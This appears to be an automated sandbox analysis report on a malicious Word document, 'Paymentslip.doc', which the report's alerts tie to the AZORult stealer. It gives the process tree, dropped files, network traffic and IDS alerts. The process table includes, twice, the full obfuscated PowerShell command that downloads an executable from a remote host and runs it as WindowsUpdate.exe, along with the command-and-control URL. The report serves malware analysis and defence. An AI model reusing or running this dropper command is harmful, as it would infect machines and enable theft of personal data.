PackagePartXmlDataDocumentIgnorable:	w14 w15 wp14
PackagePartXmlDataRelationshipsRelationshipTarget:	docProps/app.xml
PackagePartXmlDataRelationshipsRelationshipType:	http://schemas.openxmlformats.org/officeDocument/2006/relationships/extended-properties
PackagePartXmlDataRelationshipsRelationshipId:	rId3
PackagePartXmlDataRelationshipsXmlns:	http://schemas.openxmlformats.org/package/2006/relationships
PackagePartPadding:	512
PackagePartContentType:	application/vnd.openxmlformats-package.relationships+xml
PackagePartName:	/_rels/.rels

No data.

Add for printing

All screenshots are available in the full report

Add for printing

Total processes

Monitored processes

Malicious processes

Suspicious processes

Behavior graph

Click at the process to see the details

Process information

PID	CMD	Path	Indicators	Parent process
3464	"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Paymentslip.doc"	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	—	explorer.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000
2580	"C:\Windows\System32\cmd.exe" /C PoWerSHeLl -En ZgB1AG4AYwB0AGkAbwBuACAAeAA1AHAATgBKAFoAUQBSAGoANgBiAFEAUABxAFMAWABJAHUATQA0AHgAWgBqAFoATwBfADQAIAAoACAAJABjADcAVwBBAHMAbgBBADMAOABVAGIANgBvAE8AZwBpAEMASQB2AGoAUgBFAEgASgBOAHIAYQBlACAALAAgACQAVwBUAE4AOQBfAGUAeABUAEwANABzAG0ATgB4AFQAQgBwAHkAZwBuAFAAegBmAFAAIAApAHsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACAAJABjADcAVwBBAHMAbgBBADMAOABVAGIANgBvAE8AZwBpAEMASQB2AGoAUgBFAEgASgBOAHIAYQBlACAALAAgACQAVwBUAE4AOQBfAGUAeABUAEwANABzAG0ATgB4AFQAQgBwAHkAZwBuAFAAegBmAFAAIAApADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBjAG8AbQAgAFMAaABlAGwAbAAuAEEAcABwAGwAaQBjAGEAdABpAG8AbgApAC4AUwBoAGUAbABsAEUAeABlAGMAdQB0AGUAKAAgACQAVwBUAE4AOQBfAGUAeABUAEwANABzAG0ATgB4AFQAQgBwAHkAZwBuAFAAegBmAFAAIAApADsAIAB9AA0ACgB0AHIAeQB7AA0ACgANAAoAJABvAHcASgBSAEQATwBFAGsARABqAGwAdwA1AGkAUQBjADYAPQBbAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBHAGUAdABGAG8AbABkAGUAcgBQAGEAdABoACgAJwBNAHkARABvAGMAdQBtAGUAbgB0AHMAJwApACsAJwBcAFcAaQBuAGQAbwB3AHMAVQBwAGQAYQB0AGUALgBlAHgAZQAnADsADQAKAHgANQBwAE4ASgBaAFEAUgBqADYAYgBRAFAAcQBTAFgASQB1AE0ANAB4AFoAagBaAE8AXwA0ACAAJwBoAHQAdABwADoALwAvAGgAbwBzAHQALgB3AG8AcgBrAHMAawBpAGwAbABzAHcAZQBiAC4AbgBlAHQALwB+AG8AZAB5AHMAcwBlAHkALwByAG8AeQB0AC8AQwBIAEkAQgBCAEIALgBlAHgAZQAnACAAJABvAHcASgBSAEQATwBFAGsARABqAGwAdwA1AGkAUQBjADYAOwANAAoAJAB2AE4AdQBHAEwAYQB3AF8AYwBvAE4AWABCAEEAMwB3ADYAVQBNADQAcABoAHIAYgBNADcAdQB4AD0AJABlAG4AdgA6AEEAcABwAGQAYQB0AGEAKwAnAFwAVwBpAG4AZABvAHcAcwBVAHAAZABhAHQAZQAuAGUAeABlACcAOwANAAoAeAA1AHAATgBKAFoAUQBSAGoANgBiAFEAUABxAFMAWABJAHUATQA0AHgAWgBqAFoATwBfADQAIAAnAGgAdAB0AHAAOgAvAC8AaABvAHMAdAAuAHcAbwByAGsAcwBrAGkAbABsAHMAdwBlAGIALgBuAGUAdAAvAH4AbwBkAHkAcwBzAGUAeQAvAHIAbwB5AHQALwBDAEgASQBCAEIAQgAuAGUAeABlACcAIAAkAHYATgB1AEcATABhAHcAXwBjAG8ATgBYAEIAQQAzAHcANgBVAE0ANABwAGgAcgBiAE0ANwB1AHgAOwANAAoADQAKAH0AYwBhAHQAYwBoAHsAfQA=	C:\Windows\System32\cmd.exe	—	WINWORD.EXE
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
3104	PoWerSHeLl -En ZgB1AG4AYwB0AGkAbwBuACAAeAA1AHAATgBKAFoAUQBSAGoANgBiAFEAUABxAFMAWABJAHUATQA0AHgAWgBqAFoATwBfADQAIAAoACAAJABjADcAVwBBAHMAbgBBADMAOABVAGIANgBvAE8AZwBpAEMASQB2AGoAUgBFAEgASgBOAHIAYQBlACAALAAgACQAVwBUAE4AOQBfAGUAeABUAEwANABzAG0ATgB4AFQAQgBwAHkAZwBuAFAAegBmAFAAIAApAHsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACAAJABjADcAVwBBAHMAbgBBADMAOABVAGIANgBvAE8AZwBpAEMASQB2AGoAUgBFAEgASgBOAHIAYQBlACAALAAgACQAVwBUAE4AOQBfAGUAeABUAEwANABzAG0ATgB4AFQAQgBwAHkAZwBuAFAAegBmAFAAIAApADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBjAG8AbQAgAFMAaABlAGwAbAAuAEEAcABwAGwAaQBjAGEAdABpAG8AbgApAC4AUwBoAGUAbABsAEUAeABlAGMAdQB0AGUAKAAgACQAVwBUAE4AOQBfAGUAeABUAEwANABzAG0ATgB4AFQAQgBwAHkAZwBuAFAAegBmAFAAIAApADsAIAB9AA0ACgB0AHIAeQB7AA0ACgANAAoAJABvAHcASgBSAEQATwBFAGsARABqAGwAdwA1AGkAUQBjADYAPQBbAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBHAGUAdABGAG8AbABkAGUAcgBQAGEAdABoACgAJwBNAHkARABvAGMAdQBtAGUAbgB0AHMAJwApACsAJwBcAFcAaQBuAGQAbwB3AHMAVQBwAGQAYQB0AGUALgBlAHgAZQAnADsADQAKAHgANQBwAE4ASgBaAFEAUgBqADYAYgBRAFAAcQBTAFgASQB1AE0ANAB4AFoAagBaAE8AXwA0ACAAJwBoAHQAdABwADoALwAvAGgAbwBzAHQALgB3AG8AcgBrAHMAawBpAGwAbABzAHcAZQBiAC4AbgBlAHQALwB+AG8AZAB5AHMAcwBlAHkALwByAG8AeQB0AC8AQwBIAEkAQgBCAEIALgBlAHgAZQAnACAAJABvAHcASgBSAEQATwBFAGsARABqAGwAdwA1AGkAUQBjADYAOwANAAoAJAB2AE4AdQBHAEwAYQB3AF8AYwBvAE4AWABCAEEAMwB3ADYAVQBNADQAcABoAHIAYgBNADcAdQB4AD0AJABlAG4AdgA6AEEAcABwAGQAYQB0AGEAKwAnAFwAVwBpAG4AZABvAHcAcwBVAHAAZABhAHQAZQAuAGUAeABlACcAOwANAAoAeAA1AHAATgBKAFoAUQBSAGoANgBiAFEAUABxAFMAWABJAHUATQA0AHgAWgBqAFoATwBfADQAIAAnAGgAdAB0AHAAOgAvAC8AaABvAHMAdAAuAHcAbwByAGsAcwBrAGkAbABsAHMAdwBlAGIALgBuAGUAdAAvAH4AbwBkAHkAcwBzAGUAeQAvAHIAbwB5AHQALwBDAEgASQBCAEIAQgAuAGUAeABlACcAIAAkAHYATgB1AEcATABhAHcAXwBjAG8ATgBYAEIAQQAzAHcANgBVAE0ANABwAGgAcgBiAE0ANwB1AHgAOwANAAoADQAKAH0AYwBhAHQAYwBoAHsAfQA=	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe		cmd.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255)
2396	"C:\Users\admin\Documents\WindowsUpdate.exe"	C:\Users\admin\Documents\WindowsUpdate.exe		powershell.exe
User: admin Integrity Level: MEDIUM Exit code: 0
3616	"C:\Users\admin\AppData\Roaming\WindowsUpdate.exe"	C:\Users\admin\AppData\Roaming\WindowsUpdate.exe		powershell.exe
User: admin Integrity Level: MEDIUM Exit code: 0
3864	"C:\Users\admin\Documents\WindowsUpdate.exe"	C:\Users\admin\Documents\WindowsUpdate.exe		WindowsUpdate.exe
User: admin Integrity Level: MEDIUM
4044	"C:\Windows\explorer.exe"	C:\Windows\explorer.exe	—	WindowsUpdate.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Explorer Version: 6.1.7600.16385 (win7_rtm.090713-1255)
3728	"C:\Users\admin\AppData\Roaming\WindowsUpdate.exe"	C:\Users\admin\AppData\Roaming\WindowsUpdate.exe	—	WindowsUpdate.exe
User: admin Integrity Level: MEDIUM Exit code: 0
3960	"C:\Windows\explorer.exe"	C:\Windows\explorer.exe	—	WindowsUpdate.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Explorer Version: 6.1.7600.16385 (win7_rtm.090713-1255)

Add for printing

Total events

1 958

Read events

1 261

Write events

Delete events

Modification events

No data

Add for printing

Executable files

Suspicious files

Text files

Unknown types

Dropped files

PID	Process	Filename		Type
3464	WINWORD.EXE	C:\Users\admin\AppData\Local\Temp\CVRA674.tmp.cvr		—
		MD5:—	SHA256:—
3104	powershell.exe	C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\DJL6JM9VXS6ZHQZTH6V5.temp		—
		MD5:—	SHA256:—
3104	powershell.exe	C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms		binary
		MD5:0C1DAA668BA499584B0AC7476368101E	SHA256:326CCA676EAA6C8A45F71B6239CC22D9F49085AB54229E1777D0E15C50EC13DA
3464	WINWORD.EXE	C:\Users\admin\AppData\Local\Temp\~$ymentslip.doc		pgc
		MD5:F11474E91EADE8904D99124E1C6973F2	SHA256:D7F89F97B026532FC4389315114986F996150DBDAB0844714071552E9FB96F45
3464	WINWORD.EXE	C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm		pgc
		MD5:32CA13FE69C2270F4F0B5DB85CD58DD7	SHA256:20D4E0981933360A07ED8556C072B9E0871C26ADAEBB51BC2EDE902CD2407690
2396	WindowsUpdate.exe	C:\Users\admin\AppData\Local\Temp\Disk.sys		executable
		MD5:D5C9A38AAD57817E3FB74E5E63F7CAEA	SHA256:F5CDCF7643D4C4AB803AA7F3CFA1830EFB7B9B9BA6B0A69B3093285391782EE0
3616	WindowsUpdate.exe	C:\Users\admin\AppData\Local\Temp\Disk.sys		executable
		MD5:D5C9A38AAD57817E3FB74E5E63F7CAEA	SHA256:F5CDCF7643D4C4AB803AA7F3CFA1830EFB7B9B9BA6B0A69B3093285391782EE0
2396	WindowsUpdate.exe	C:\Users\admin\AppData\Local\Chrome\StikyNot.exe		executable
		MD5:D5C9A38AAD57817E3FB74E5E63F7CAEA	SHA256:F5CDCF7643D4C4AB803AA7F3CFA1830EFB7B9B9BA6B0A69B3093285391782EE0
3104	powershell.exe	C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF13ae93.TMP		binary
		MD5:0C1DAA668BA499584B0AC7476368101E	SHA256:326CCA676EAA6C8A45F71B6239CC22D9F49085AB54229E1777D0E15C50EC13DA
3104	powershell.exe	C:\Users\admin\Documents\WindowsUpdate.exe		executable
		MD5:D5C9A38AAD57817E3FB74E5E63F7CAEA	SHA256:F5CDCF7643D4C4AB803AA7F3CFA1830EFB7B9B9BA6B0A69B3093285391782EE0

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Add for printing

HTTP(S) requests

TCP/UDP connections

DNS requests

Threats

HTTP requests

PID	Process	Method	HTTP Code	IP	URL	CN	Type	Size	Reputation
3104	powershell.exe	GET	200	112.140.179.97:80	http://host.workskillsweb.net/~odyssey/royt/CHIBBB.exe	AU	executable	432 Kb	suspicious
3104	powershell.exe	GET	200	112.140.179.97:80	http://host.workskillsweb.net/~odyssey/royt/CHIBBB.exe	AU	executable	432 Kb	suspicious
3864	WindowsUpdate.exe	POST	200	185.126.200.160:80	http://www.admindocmarkens.us/chib/index.php	IR	binary	4.27 Mb	malicious
3864	WindowsUpdate.exe	POST	200	185.126.200.160:80	http://www.admindocmarkens.us/chib/index.php	IR	text	2 b	malicious

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID	Process	IP	Domain	ASN	CN	Reputation
3864	WindowsUpdate.exe	185.126.200.160:80	www.admindocmarkens.us	Tebyan-e-Noor Cultural-Artistic Institute	IR	malicious
3104	powershell.exe	112.140.179.97:80	host.workskillsweb.net	SYNERGY WHOLESALE PTY LTD	AU	suspicious

DNS requests

Domain	IP	Reputation
host.workskillsweb.net	112.140.179.97	suspicious
www.admindocmarkens.us	185.126.200.160	malicious

Threats

PID	Process	Class	Message
3104	powershell.exe	Potential Corporate Privacy Violation	ET POLICY PE EXE or DLL Windows file download HTTP
3104	powershell.exe	Potentially Bad Traffic	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3104	powershell.exe	Potentially Bad Traffic	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3864	WindowsUpdate.exe	A Network Trojan was detected	ET TROJAN AZORult Variant.4 Checkin M2
3864	WindowsUpdate.exe	A Network Trojan was detected	MALWARE [PTsecurity] AZORult client request
3864	WindowsUpdate.exe	A Network Trojan was detected	MALWARE [PTsecurity] AZORult HTTP Header
3864	WindowsUpdate.exe	A Network Trojan was detected	MALWARE [PTsecurity] AZORult encrypted PE file
3864	WindowsUpdate.exe	A Network Trojan was detected	MALWARE [PTsecurity] AZORult HTTP Header
3864	WindowsUpdate.exe	A Network Trojan was detected	MALWARE [PTsecurity] AZORult client request

3 ETPRO signatures available at the full report

Add for printing

No debug info

General Info

Paymentslip.doc

BB8C9DB2445E7ECC4E4EEFC6ED1CB418

A5E390676EE75888494C3150ED913BF70882E9C6

FD24DE4D53E61EB7CD0C7B7B99552361DB2024B456568CB14ACCD6F59ADC3363

6144:+M516FgSNHUfWFqupSBUKTrOwl0hsXUEM9y:z6FgZWB0nOwl0hsXUEuy

Software environment set and analysis options

Launch configuration

Software preset

Hotfixes

Behavior activities

MALICIOUS

Starts CMD.EXE for commands execution

Unusual execution from Microsoft Office

Executes PowerShell scripts

Application was dropped or rewritten from another process

Downloads executable files from the Internet

AZORULT was detected

Connects to CnC server

Changes the autorun value in the registry

Loads dropped or rewritten executable

Actions looks like stealing of personal data

SUSPICIOUS

Executable content was dropped or overwritten

Creates files in the user directory

Application launched itself

INFO

Reads Microsoft Office registry keys

Creates files in the user directory

Malware configuration

Static information

TRiD

EXIF

XMP

Video and screenshots

Processes

Behavior graph

Specs description

Process information

Information

Information

Information

Information

Information

Information

Information

Information

Information

Registry activity

Modification events

Files activity

Dropped files

Network activity

HTTP requests

Connections

DNS requests

Threats

Debug output strings